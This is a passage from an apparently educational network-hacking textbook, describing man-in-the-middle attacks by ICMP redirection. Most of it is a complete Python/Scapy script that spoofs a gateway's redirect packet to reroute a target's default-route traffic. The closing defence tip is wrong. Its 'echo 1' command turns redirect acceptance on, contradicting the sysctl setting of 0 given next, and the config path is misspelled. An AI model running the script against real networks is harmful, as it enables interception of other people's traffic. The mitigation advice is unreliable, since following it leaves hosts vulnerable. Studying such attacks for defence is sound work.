Menu
Home
Log in / Register
 
Home arrow Computer Science arrow Understanding Network Hacks
< Prev   CONTENTS   Next >

5.10 ICMP-Redirection

Most network administrators nowadays know of man-in-the-middle attacks through ARP-cache-poisoning described in Sect. 4.2. Much more silently than ARP spoofing is a Mitm implemented with an ICMP-Redirection. Thus the attack only needs a single packet to intercept the whole traffic to a specified route like the default gateway.

ICMP is much more than the every day used ICMP-Echo aka ping command and the resulting Echo Response packet. ICMP is the error protocol of IP (see Sect. 2.8). It is used to tell computers that another host or a whole network or protocol is unreachable, to tell it that the TTL of a packet got exceeded or that a router thinks it knows a quicker route to your destination and you should use that in future connections.

1 #!/usr/bin/python

2

3 import sys

4 import getopt

5 from scapy.all import send, IP, ICMP

6

7 # The address we send the packet to

8 target = None

9

10 # The address of the original gateway

11 old_gw = None

12

13 # The address of our desired gateway

14 new_gw = None

15

16

17 def usage():

18 print sys.argv[0] + """

19 -t <target>

20 -o <old_gw>

21 -n <new_gw>"""

22 sys.exit(1)

23

24 # Parsing parameter

25 try:

26 cmd_opts = "t:o:n:r:"

27 opts, args = getopt.getopt(sys.argv[1:], cmd_opts)

28 except getopt.GetoptError:

29 usage()

30

31 for opt in opts:

32 if opt[0] == "-t":

33 target = opt[1]

34 elif opt[0] == "-o":

35 old_gw = opt[1]

36 elif opt[0] == "-n":

37 new_gw = opt[1]

38 else:

39 usage()

40

41 # Construct and send the packet

42 packet = IP(src=old_gw, dst=target) /

43 ICMP(type=5, code=1, gw=new_gw) /

44 IP(src=target, dst='0.0.0.0')

45 send(packet)

The source code should look familiar, because it is mostly the same as the IP spoofing example in Sect. 5.6. It just differs in how we creates the packet. We construct a packet that looks like it is being sent from the old gateway or router that tells the target: “Hey there's someone that can do the job better then me!”. Translated to ICMP that is code 1, type 5, and the gw parameter includes the IP of the new gateway. Last but not least we must set the destination of the route in our case 0.0.0.0 for overwriting the default route. Here you can define any other route you like to alter.

ICMP redirection attacks can be easily defended against on a Linux system by deactivating the accept-redirects kernel option. This can be achieved by the following magic line:

echo 1 > /proc/sys/net/ipv4/conf/all/accept_redirects

or by editing /etc/systctl.conf and setting

net.ipv4.conf.all.accept_redirects = 0

BSDand Mac OS X systems provide similar functionality.

 
Found a mistake? Please highlight the word and press Shift + Enter  
< Prev   CONTENTS   Next >

Related Topics

ICMP
 
Subjects
Accounting
Business & Finance
Communication
Computer Science
Economics
Education
Engineering
Environment
Geography
Health
History
Language & Literature
Law
Management
Marketing
Philosophy
Political science
Psychology
Religion
Sociology
Travel